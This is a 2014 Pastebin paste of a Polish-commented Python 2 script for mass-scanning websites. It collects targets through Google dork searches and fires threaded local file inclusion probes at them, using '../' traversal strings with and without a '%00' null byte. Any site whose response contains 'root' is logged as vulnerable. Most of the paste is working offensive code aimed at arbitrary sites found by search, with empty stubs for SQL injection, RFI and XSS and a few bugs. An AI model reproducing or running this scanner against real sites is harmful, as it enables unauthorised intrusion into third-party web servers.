API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 25th, 2014
237
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.66 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python2.7
  2.  
  3. import requests
  4. import time
  5. import os
  6. import sys
  7. import json
  8. import random
  9. from google import search
  10. import datetime
  11. import threading
  12.  
  13. def usage():
  14.     ms = '''
  15.    ##############################################################
  16.    cmd:: help == help
  17.    cmd::files - show files
  18.    cmd:: getdoorks == pobiera doorki do pliku .txt, bez skanowania
  19.    cmd:: lfiscan == skanuje lfi
  20.    ###############################################################
  21.    '''
  22.     return ms
  23.  
  24. try:
  25.     os.system('mkdir targets')
  26.     print '\n',usage(),'\n'
  27. except:
  28.     pass
  29.  
  30. def search_target(dork='index.php?lang=',langs='pl',domain='pl',limits=20,savefile=False):
  31.     target_list = []
  32.     if savefile:
  33.         fname = raw_input('Podaj nazwe pliku: ')
  34.     print '       \n******Looking for targets...******\n\n'
  35.     for target in search(dork, tld=domain, lang=langs, stop=limits):
  36.         url_ = target
  37.         print url_
  38.         target_list.append(url_)
  39.     if savefile:
  40.         with open('targets/'+fname,'a') as fi:
  41.             for i in xrange(len(target_list)):
  42.                 fi.write(target_list[i]+'\n')
  43.         print '\n done.'
  44.     else:
  45.         return target_list
  46.    
  47. def show_files():
  48.     os.system('cd targets && ls')
  49.    
  50. def path_scan(fname,froms,to):
  51.     print '*****scaning for [LFI]*****\n'
  52.     time.sleep(1.5)
  53.     list_ur = fname
  54.     new_list_ur = []
  55.     for new_link in list_ur:
  56.         n = new_link.split('=') # na razie zbiera tylko jeden parametr z geta, bo tylko 5% stron z searchu maja wiecej
  57.         new_list_ur.append(n[0])
  58.     lfi_vuln = []
  59.     for ix in xrange(froms,to):
  60.         for i in xrange(8):   #ile razy podbic up w katalogu (../)
  61.             etc = lambda x: '../' * i
  62.             proxy = {'http':'localhost:8080', #proxy odpowiednio dla http i https
  63.                      'https':'localhost:8080'}
  64.             reqp = requests.get(new_list_ur[ix]+'='+str(etc(i)+'../etc/TESTUJE_TYLKO'),proxies=None) #proxy odpalasz poprzez zamiane None na zmienna proxy
  65.             reqp2 = requests.get(new_list_ur[ix]+'='+str(etc(i)+'../etc/TESTUJE_TYLKO%00'),proxies=None) #mozna skopiowac te linie, dodac zmienna rcontent3 dla windowsa
  66.             rcontent = reqp.content
  67.             rcontent2 = reqp2.content
  68.             print reqp.url
  69.             print reqp2.url
  70.             if rcontent.count('root'): #co ma zawierac podatna strona w zrodle, to nizej tez.
  71.                 lfi_vuln.append(reqp.url)
  72.             elif rcontent2.count('root'): #rownolegle skanuje z/bez bajta zerowego
  73.                 lfi_vuln.append(reqp2.url)
  74.     print lfi_vuln
  75.     f = open('targets/'+random.randint(243,9845)+'lfi_ok_'+'.txt','a')
  76.     lff = len(lfi_vuln)
  77.     for lll in xrange(lff):
  78.         f.write(lfi_vuln[lll]+'\n')
  79.     sys.exit()
  80.  
  81.  
  82. def sqli(fname):
  83.     #definicja blind sql injection, 10% zwracanej wagi strony  == blind
  84.     pass
  85.  
  86. def PCI(fname):
  87.     pass
  88.  
  89. def RFI(fname):
  90.     pass
  91.  
  92. def xss(fname):
  93.     pass
  94.  
  95. def new_req():
  96.     pass
  97.  
  98. def main2():
  99.     cmd = raw_input('cmd:: ')
  100.     if cmd == 'getdoorks':
  101.             dorkz = raw_input('podaj dork: eg. index.php?id= :')
  102.             cczz = int(raw_input('ile stron pobrac?: '))
  103.             dorname = dorkz.replace('.','-')
  104.             search_target(dorkz,limits=cczz,savefile=True)
  105.     elif cmd == 'lfiscan':
  106.         forli = int(raw_input('chcesz pobrac z pliku[1] czy od nowa, z dorka?[0]: '))
  107.         if forli:
  108.             des_list = []
  109.             print 'lista dostepnych plikow:\n'
  110.             show_files()
  111.             fnm = raw_input('podaj nazwe pliku: ')
  112.             try:
  113.                 with open('targets/'+fnm,'r') as fi:
  114.                     for uri in fi:
  115.                         des_list.append(uri)
  116.             except:
  117.                 print 'nie ma takiego pliku!'
  118.                 sys.exit()
  119.         else:
  120.             dork = raw_input('podaj dork: eg. index.php?id= :')
  121.             dorkzna = dork.replace('.','-')
  122.             cc = int(raw_input('ile stron pobrac?: '))
  123.             des_list = search_target(dork,limits=cc)
  124.         lonlist = len(des_list)
  125.         print 'ilosc stron do przeskanowania: ',lonlist
  126.         time.sleep(2)
  127.         rhr_cc = 20 #################  <= ile watkow
  128.         thr = lonlist / rhr_cc
  129.         for x in xrange(rhr_cc):
  130.             threading.Thread(target=path_scan,args=(des_list,thr*x,thr+thr*x)).start()
  131.     elif cmd == 'show':
  132.         show_files()
  133.         fnmw = raw_input('nazwa pliku: ')
  134.         os.system('cd targets && nano %s') % (fnmw)
  135.     elif cmd == 'files':
  136.             show_files()
  137.     elif cmd == 'help':
  138.             print '\n',usage(),'\n'
  139.  
  140.  
  141. if __name__ == '__main__':
  142.     while True:
  143.         main2()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!